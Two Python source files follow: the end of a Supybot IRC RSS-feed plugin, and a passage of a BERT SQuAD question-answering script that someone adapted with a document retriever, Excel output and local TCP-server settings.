"""<name> <url>
Adds a command to this plugin that will look up the RSS feed at the
given URL.
"""
self.assert_feed_does_not_exist(name, url)
self.register_feed_config(name, url)
self.register_feed(name, url, True, False)
irc.replySuccess()
add = wrap(add, ['feedName', 'url'])
@internationalizeDocstring
def remove(self, irc, msg, args, name):
"""<name>
Removes the command for looking up RSS feeds at <name> from
this plugin.
"""
feed = self.get_feed(name)
if not feed:
irc.error(_('That\'s not a valid RSS feed command name.'))
return
self.remove_feed(feed)
irc.replySuccess()
remove = wrap(remove, ['feedName'])
class announce(callbacks.Commands):
@internationalizeDocstring
def list(self, irc, msg, args, channel):
"""[<channel>]
Returns the list of feeds announced in <channel>. <channel> is
only necessary if the message isn't sent in the channel itself.
"""
announce = conf.supybot.plugins.RSS.announce
feeds = format('%L', list(announce.get(channel)()))
irc.reply(feeds or _('I am currently not announcing any feeds.'))
list = wrap(list, ['channel',])
@internationalizeDocstring
def add(self, irc, msg, args, channel, feeds):
"""[<channel>] <name|url> [<name|url> ...]
Adds the list of feeds to the current list of announced feeds in
<channel>. Valid feeds include the names of registered feeds as
well as URLs for RSS feeds. <channel> is only necessary if the
message isn't sent in the channel itself.
"""
plugin = irc.getCallback('RSS')
invalid_feeds = [x for x in feeds if not plugin.get_feed(x)
and not utils.web.urlRe.match(x)]
if invalid_feeds:
irc.error(format(_('These feeds are unknown: %L'),
invalid_feeds), Raise=True)
announce = conf.supybot.plugins.RSS.announce
S = announce.get(channel)()
for name in feeds:
S.add(name)
announce.get(channel).setValue(S)
irc.replySuccess()
for name in feeds:
feed = plugin.get_feed(name)
if not feed:
plugin.register_feed_config(name, name)
plugin.register_feed(name, name, True, False)
feed = plugin.get_feed(name)
plugin.announce_feed(feed, True)
add = wrap(add, [('checkChannelCapability', 'op'),
many(first('url', 'feedName'))])
@internationalizeDocstring
def remove(self, irc, msg, args, channel, feeds):
"""[<channel>] <name|url> [<name|url> ...]
Removes the list of feeds from the current list of announced feeds
in <channel>. Valid feeds include the names of registered feeds as
well as URLs for RSS feeds. <channel> is only necessary if the
message isn't sent in the channel itself.
"""
announce = conf.supybot.plugins.RSS.announce
S = announce.get(channel)()
for feed in feeds:
S.discard(feed)
announce.get(channel).setValue(S)
irc.replySuccess()
remove = wrap(remove, [('checkChannelCapability', 'op'),
many(first('url', 'feedName'))])
@internationalizeDocstring
def rss(self, irc, msg, args, url, n):
"""<name|url> [<number of headlines>]
Gets the title components of the given RSS feed.
If <number of headlines> is given, return only that many headlines.
"""
self.log.debug('Fetching %u', url)
feed = self.get_feed(url)
if not feed:
feed = Feed(url, url, True)
if irc.isChannel(msg.args[0]):
channel = msg.args[0]
else:
channel = None
self.update_feed_if_needed(feed)
entries = feed.entries
if not entries:
irc.error(_('Couldn\'t get RSS feed.'))
return
n = n or self.registryValue('defaultNumberOfHeadlines', channel)
entries = list(filter(lambda e:self.should_send_entry(channel, e),
feed.entries))
entries = entries[:n]
headlines = map(lambda e:self.format_entry(channel, feed, e, False),
entries)
sep = self.registryValue('headlineSeparator', channel)
irc.replies(headlines, joiner=sep)
rss = wrap(rss, [first('url', 'feedName'), additional('int')])
@internationalizeDocstring
def info(self, irc, msg, args, url):
"""<url|feed>
Returns information from the given RSS feed, namely the title,
URL, description, and last update date, if available.
"""
try:
url = self.registryValue('feeds.%s' % url)
except registry.NonExistentRegistryEntry:
pass
feed = self.get_feed(url)
if not feed:
feed = Feed(url, url, True)
self.update_feed_if_needed(feed)
info = feed.data
if not info:
irc.error(_('I couldn\'t retrieve that RSS feed.'))
return
# check the 'modified_parsed' key, if it's there, convert it here first
if 'modified' in info:
seconds = time.mktime(info['modified_parsed'])
now = time.mktime(time.gmtime())
when = utils.timeElapsed(now - seconds) + ' ago'
else:
when = _('time unavailable')
title = info.get('title', _('unavailable'))
desc = info.get('description', _('unavailable'))
link = info.get('link', _('unavailable'))
# The rest of the entries are all available in the channel key
response = format(_('Title: %s; URL: %u; '
'Description: %s; Last updated: %s.'),
title, link, desc, when)
irc.reply(utils.str.normalizeWhitespace(response))
info = wrap(info, [first('url', 'feedName')])
RSS = internationalizeDocstring(RSS)
Class = RSS
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
run_squad_ColabTCPTrans_quicktest_20191119.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os, types
import random
import modeling
import optimization
import tokenization
import six
import copy
#import tensorflow as tf
import numpy as np
import scipy.sparse as sp
from pathlib import Path
import tensorflow.compat.v1 as tf
import tensorflow as tfori
# do excel
from openpyxl import Workbook
import uuid
# do
import code
import prettytable
from decimal import *
import decimal
getcontext().prec = 50
#Willy Define
example_in_set_eval_examples = 0
example_in_write_predictions = 0
predict_result_index = 0
checkState_in_AtenResult = 0
checkState_in_AtenResult2 = 0
checkState_in_GetAnswer = 0
checkState_add_retriever = 0
FollowInitTPU = 1
Model_ListIndex = 0
willy_check_code = "willy test on 201911271343"
Disconnect_KEYWORD = 'Aten Colab Disconect'
from drqa import retriever
DOC2IDX = None
documents = []
#db_class = retriever.get_class('sqlite')
#all_results_pb : WillyAdd
all_results_pb = []
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPido_interactiveece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
flags.DEFINE_bool(
"do_retriever", False,
"If True, use retriever to help reader to filte good doc - add by willy.")
flags.DEFINE_string(
"retriever_model", None,
"retriever model path - add by willy.")
flags.DEFINE_float(
"retriever_weight", 0.0,
"retriever weight - add by willy.")
flags.DEFINE_integer("retriever_ranker", 1,"Rank with retriever.")
flags.DEFINE_string("document_type","SQuAD", "There are three document types: (1)paragraphs in SQuAD (2)SQlite (DataBase) (3) Text - add by willy." )
flags.DEFINE_string("question_type","SQuAD", "There are three question types: (1) SQuAD (2)one_question (3) interactive." )
flags.DEFINE_string("question", None, "give question to predict - Willy Test.")
flags.DEFINE_string("db_file", None, "give path with data base file to set SQlite State - Willy Test.")
flags.DEFINE_string("question_table", None, "set table path - Willy Test.")
flags.DEFINE_string("excel_name", None ,"set excel name -Willy Test.")
flags.DEFINE_integer("show_all_choice", 0, "show all choice-Willy Test.")
flags.DEFINE_float(
"choice_score", 0.15,
"choice score. - add by willy.")
flags.DEFINE_float(
"threshold_prob_ans_merge", 0.5,
"threshold prob ans_merge - add by willy.")
flags.DEFINE_string("Host_TCPServer", '127.0.0.1' ,"Set TCP Host-Willy Test.")
flags.DEFINE_integer("PORT_TCPServer", 1234, "Set TCP Port-Willy Test.")
flags.DEFINE_bool("Save_PB_Model", False, "Save PB File.")
flags.DEFINE_string("EXPORT_PATH", None, "Path of export path.")
flags.DEFINE_string("EXPORT_PREDICT_PATH", None, "Path of export predict path.")
ranker = None
class DecimalEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
return super(DecimalEncoder, self).default(obj)
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_id, #willy add
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_id = doc_id #willy add
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_id:[%s]" % (tokenization.printable_text(self.doc_id)) #willy add
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def TakeThird(val):
return val[2]
def set_squad_examples(input_file,question):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
file = open("Output1.txt", "r")
document = file.read()
file.close()
paragraphs = document.split('\n')
paragraphs = list(filter(None, paragraphs))
#-----------------------------------------------
doc_tokensList = []
for i , paragraph_text in enumerate(paragraphs):
# paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
doc_tokensList.append(doc_tokens)
#-----------------------------------------------
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for i, doc_tokens in enumerate(doc_tokensList):
example = SquadExample(
qas_id=str(uuid.uuid1()),
question_text=question,
doc_id=DOC2IDX[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
'''
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
#qas_id = qa["id"]
# uuid reset by willy in 20190313
qas_id = str(uuid.uuid1())
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for doc_tokens in doc_tokensList:
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
print(example)
examples.append(example)
'''
#-----------------------------------------------
return examples
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length -
1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning("Could not find answer: '%s' vs. '%s'",
actual_text, cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
'''
if example_index < 10:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (unique_id))
tf.logging.info("example_index: %s" % (example_index))
tf.logging.info("doc_span_index: %s" % (doc_span_index))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(tokens[start_position:(end_position + 1)])
tf.logging.info("start_position: %d" % (start_position))
tf.logging.info("end_position: %d" % (end_position))
tf.logging.info(
"answer: %s" % (tokenization.printable_text(answer_text)))
'''
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
#tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
print('tpu_scaffold step1')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
print('tpu_scaffold step2')
return tf.train.Scaffold()
#tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
#return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
print('not initcheck')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
output_spec = tfori.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
print('scaffold_fn, step3')
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"unique_ids": tf.io.FixedLenFeature([], tf.int64),
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.io.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.io.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case
):
"""Write final predictions to the json file and log-odds of null if needed."""
global ranker
'''
tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
tf.logging.info("Writing Aten predic to: %s" % (output_Aten_predict_file))
'''
ans_list = []
text_list = []
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
#tf.logging.info("length of all_results: %d" % (len(all_results)))
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
# Willy Addd collections -> for results
#-------------------------------------------------------------------------------
_AllPredictions = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictions",
["question", "PredictListOneQues"])
_AllPredictResultsInOneQuestion = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneQuestion",
["doc_text", "doc_id", "doc_score", "PredictListOneDoc"])
_AllPredictResultsInOneDocument = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneDocument",
["answer", "prob", "start", "end"])
_FinalResult = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult",
["question", "text", "text_id", "ans", "prob"])
_FinalResult2 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult2",
["question", "text", "ans", "prob"])
_FinalResult3 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult3",
["question", "text", "ans", "ans_prob", "TFIDF", "Score", "choice"])
_FinalResultAll = collections.namedtuple( # pylint: disable=invalid-name
"FinalResultAll",
["question", "text1", "ans1", "ans_prob1", "TFIDF1", "Score1", "text2", "ans2", "ans_prob2", "TFIDF2", "Score2", "choice"])
_TempAllpredict_Layer1 = collections.namedtuple( # pylint: disable=invalid-name
